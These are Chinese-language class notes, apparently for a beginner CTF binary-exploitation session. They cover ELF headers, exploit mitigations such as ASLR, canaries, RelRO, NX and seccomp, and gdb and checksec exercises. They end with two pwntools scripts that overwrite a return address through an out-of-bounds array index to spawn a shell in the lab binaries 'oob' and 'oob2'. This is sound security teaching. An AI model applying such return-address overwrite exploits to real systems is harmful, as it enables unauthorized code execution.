NCtfU - 11/21(Pwn I r8)(Online)

# NCtfU - 11/21(Pwn I r8)(Online) ###### tags: `新手場` `nctfu2023fall` :::success [toc] ::: :::info 講者 r888800009 ::: ## 開始時間 - PM 8:00 - 線上 (DC直播) ## 講者簡報 [簡報](https://drive.google.com/drive/u/0/folders/1Z7UQNCkdbck4crUbsJxmszDYquGhGTxJ)(需要請聯繫 r8) ## 共筆 ### Lab - readelf ELF Header ```shell! readelf -h /bin/sh ``` Program Header ```shell! readelf -l /bin/sh // 查看 segment ``` Section Header ```shell! readelf -S /bin/sh // 查看 section ``` 找找看 .text section 在哪個 segement ```shell! readelf -l /bin/sh // 第二個 load 的 segment ``` ### Lab - Mitigations 常見 CTF 保護機制 * ASLR / PIE ( PIE 使程式支援 ASLR ) * Address Space Layout Randomization * Position-Independent Executable => DYN file * Stack Guard - Canary * RelRO * Relocation Read-Only * NX bit * No eXecute bit * W^X Policy * Sandbox ( Isolation ) * Seccomp 分析工具 * Sanitizers * Address Sanitizer * Thread Sanitizer * Memory Sanitizer * Leak Sanitizer 編譯不是 PIE 格式但是有 canary 保護的 ELF ```shell! gcc mitigations.c -lseccomp -o mitigations -no-pie ``` 執⾏四次 ./mitigations，並且記錄每次 libc 的位置 ```shell! gdb ./mitigations $ b main $ run $ info shared library // find the place of Shared Object Library: // /lib/x86_64-linux-gnu/libc.so.6 ``` ``` // first execution From 0x00007ffff7d90700 to 0x00007ffff7f22abd // second execution From 0x00007ffff7d90700 to 0x00007ffff7f22abd // third execution From 0x00007ffff7d90700 to 0x00007ffff7f22abd // fourth execution From 0x00007ffff7d90700 to 0x00007ffff7f22abd ``` Checksec ```shell! CANARY : ENABLED FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partial ( from gdb-peda ) ``` 檢視編譯好的 mitigations 有限制哪些 syscall ```shell! seccomp-tools dump ./mitigations ``` 透過 gdb 找出 canary 的數值透過搜尋 canary 找出 TLS 的位置 ### oob ```python! from pwn import * c = process("./oob") context.log_level = 'debug' c.recvuntil("gift") # drop string # pointer to the function 'shellcode' shellcode = c.recvline()[1:-1] print(shellcode) # array[0] at [rbp - 10h] # ( 0x10 + 8 ) / 8 = 3 c.sendlineafter(":", str(3)) c.sendlineafter(":", shellcode) # shell c.interactive() c.close() ``` ### Lab - oob2 ```python! from pwn import * c = process("./oob2") context.log_level = 'debug' c.recvuntil("gift") # drop string shellcode = c.recvline()[1:-1] print(shellcode) # array[0] at [rbp - 20h] # ( 0x20 + 8 ) / 8 = 5 c.sendlineafter(":", str(5)) c.sendlineafter(":", shellcode) c.interactive() c.close() ```